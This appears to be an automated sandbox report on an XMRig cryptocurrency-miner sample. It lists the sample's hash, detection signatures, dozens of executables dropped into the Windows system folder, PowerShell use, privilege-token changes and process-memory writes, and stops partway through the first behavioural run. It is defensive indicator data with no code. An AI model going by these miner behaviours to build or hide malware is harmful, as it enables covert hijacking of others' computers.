Malware Analysis Report

2025-04-19 16:57

Sample ID 240522-zdhs9sff4z
Target 35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe
SHA256 61afe9dcf326f010c39c1c3ecb0063abd022cefb7cc29b6a9777d83b0ef27a79
Tags
upx miner xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

61afe9dcf326f010c39c1c3ecb0063abd022cefb7cc29b6a9777d83b0ef27a79

Threat Level: Known bad

The file 35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

Suspicious use of NtCreateUserProcessOtherParentProcess

Xmrig family

XMRig Miner payload

xmrig

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-22 20:36

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 20:35

Reported

2024-05-22 20:38

Platform

win7-20240221-en

Max time kernel

149s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\ifQndzY.exe N/A
N/A N/A C:\Windows\System\ipWXVFr.exe N/A
N/A N/A C:\Windows\System\jaAuCtC.exe N/A
N/A N/A C:\Windows\System\okmMnPl.exe N/A
N/A N/A C:\Windows\System\LgfzDBn.exe N/A
N/A N/A C:\Windows\System\HKqdahk.exe N/A
N/A N/A C:\Windows\System\MhLqYRz.exe N/A
N/A N/A C:\Windows\System\GNUWyHB.exe N/A
N/A N/A C:\Windows\System\xkjhmwC.exe N/A
N/A N/A C:\Windows\System\AmxBrUH.exe N/A
N/A N/A C:\Windows\System\oDWnPfE.exe N/A
N/A N/A C:\Windows\System\uOgSixk.exe N/A
N/A N/A C:\Windows\System\rJydOJW.exe N/A
N/A N/A C:\Windows\System\FAROysU.exe N/A
N/A N/A C:\Windows\System\PNpnkwR.exe N/A
N/A N/A C:\Windows\System\wOIpRBT.exe N/A
N/A N/A C:\Windows\System\TZCAEHl.exe N/A
N/A N/A C:\Windows\System\YAnlios.exe N/A
N/A N/A C:\Windows\System\mTuDxUL.exe N/A
N/A N/A C:\Windows\System\zSPoBFR.exe N/A
N/A N/A C:\Windows\System\CmdKrOa.exe N/A
N/A N/A C:\Windows\System\zMedrBD.exe N/A
N/A N/A C:\Windows\System\ivvBPaY.exe N/A
N/A N/A C:\Windows\System\vIAhSLq.exe N/A
N/A N/A C:\Windows\System\jUMVpNd.exe N/A
N/A N/A C:\Windows\System\uFEkMbr.exe N/A
N/A N/A C:\Windows\System\RTqRbLm.exe N/A
N/A N/A C:\Windows\System\UnNFDEl.exe N/A
N/A N/A C:\Windows\System\VbSEeme.exe N/A
N/A N/A C:\Windows\System\jJIBQXE.exe N/A
N/A N/A C:\Windows\System\EymKlZn.exe N/A
N/A N/A C:\Windows\System\kNCxyGB.exe N/A
N/A N/A C:\Windows\System\eqroqCr.exe N/A
N/A N/A C:\Windows\System\uuGccWN.exe N/A
N/A N/A C:\Windows\System\vdjwwvj.exe N/A
N/A N/A C:\Windows\System\erSJxWX.exe N/A
N/A N/A C:\Windows\System\mbTooqp.exe N/A
N/A N/A C:\Windows\System\nqiYQch.exe N/A
N/A N/A C:\Windows\System\JRbqhLS.exe N/A
N/A N/A C:\Windows\System\WYQyfou.exe N/A
N/A N/A C:\Windows\System\fKqXrXf.exe N/A
N/A N/A C:\Windows\System\orndOFF.exe N/A
N/A N/A C:\Windows\System\nTmThpr.exe N/A
N/A N/A C:\Windows\System\WwxVUgV.exe N/A
N/A N/A C:\Windows\System\EQrCocv.exe N/A
N/A N/A C:\Windows\System\nvCJULy.exe N/A
N/A N/A C:\Windows\System\itIQtXw.exe N/A
N/A N/A C:\Windows\System\NcxJKEj.exe N/A
N/A N/A C:\Windows\System\QafOrHJ.exe N/A
N/A N/A C:\Windows\System\dGQMWel.exe N/A
N/A N/A C:\Windows\System\Hsvotfc.exe N/A
N/A N/A C:\Windows\System\AoGdRUL.exe N/A
N/A N/A C:\Windows\System\KucEzuS.exe N/A
N/A N/A C:\Windows\System\OeVsRaD.exe N/A
N/A N/A C:\Windows\System\xFEUpAY.exe N/A
N/A N/A C:\Windows\System\ghrYUAq.exe N/A
N/A N/A C:\Windows\System\SWZPwLk.exe N/A
N/A N/A C:\Windows\System\kXwdUHk.exe N/A
N/A N/A C:\Windows\System\izrqqEY.exe N/A
N/A N/A C:\Windows\System\uqBEqbW.exe N/A
N/A N/A C:\Windows\System\kHIgBmL.exe N/A
N/A N/A C:\Windows\System\ciyQNTx.exe N/A
N/A N/A C:\Windows\System\HEXUmhe.exe N/A
N/A N/A C:\Windows\System\bHlPGAF.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\HvSbfRf.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\BZHgUHl.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\gyBxZWe.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\FMbpgrd.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\AWLpRjn.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\HeznZbW.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\EYsbCNl.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\ODiQatE.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\mmwmXyR.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\tbveewO.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\lQTKjhQ.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\EBBNNIQ.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\JTGpPMw.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\rqtzCBe.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\UdnwYxs.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\kzNDhwN.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\SJOQyXn.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\vhXNzFo.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\SOwxjzy.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\BhvVLWJ.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\joTmHDv.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\BhRSTmN.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\hkWVNxP.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\PIiJukH.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\wFwijKa.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\DwynKrZ.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\LZfLqPY.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\KSSwfOZ.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\MJUGNlh.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\cLZAIXA.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\aEcCHSo.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\BapcGMS.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\jJIBQXE.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\iFVUciu.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\lJReJQF.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\LFoRCWO.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\cTVXnoj.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\wwcWXTi.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\rmzAQsb.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\ArEtvQX.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\BqXVwXr.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\kENzvIn.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\BOZPRLY.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\hcttFdi.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\NsrrsVX.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\DKjiSiD.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\emJYqkS.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\JOiWjUZ.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\UiBZazC.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZJwIBJG.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\cSYEcCM.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\kyucFWx.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\emWVBIb.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\xMyGeNc.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\kFWzlzN.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\HszUbHf.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\iRWdeBm.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\clBwdlR.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\GSPrAxD.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\YwfeqhU.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\qrinAUk.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\PPsFkde.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\jrihOYT.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\RRtiEzh.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2864 wrote to memory of 792 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 792 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 792 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\ifQndzY.exe
PID 2864 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\ifQndzY.exe
PID 2864 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\ifQndzY.exe
PID 2864 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\ipWXVFr.exe
PID 2864 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\ipWXVFr.exe
PID 2864 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\ipWXVFr.exe
PID 2864 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\jaAuCtC.exe
PID 2864 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\jaAuCtC.exe
PID 2864 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\jaAuCtC.exe
PID 2864 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\LgfzDBn.exe
PID 2864 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\LgfzDBn.exe
PID 2864 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\LgfzDBn.exe
PID 2864 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\okmMnPl.exe
PID 2864 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\okmMnPl.exe
PID 2864 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\okmMnPl.exe
PID 2864 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\MhLqYRz.exe
PID 2864 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\MhLqYRz.exe
PID 2864 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\MhLqYRz.exe
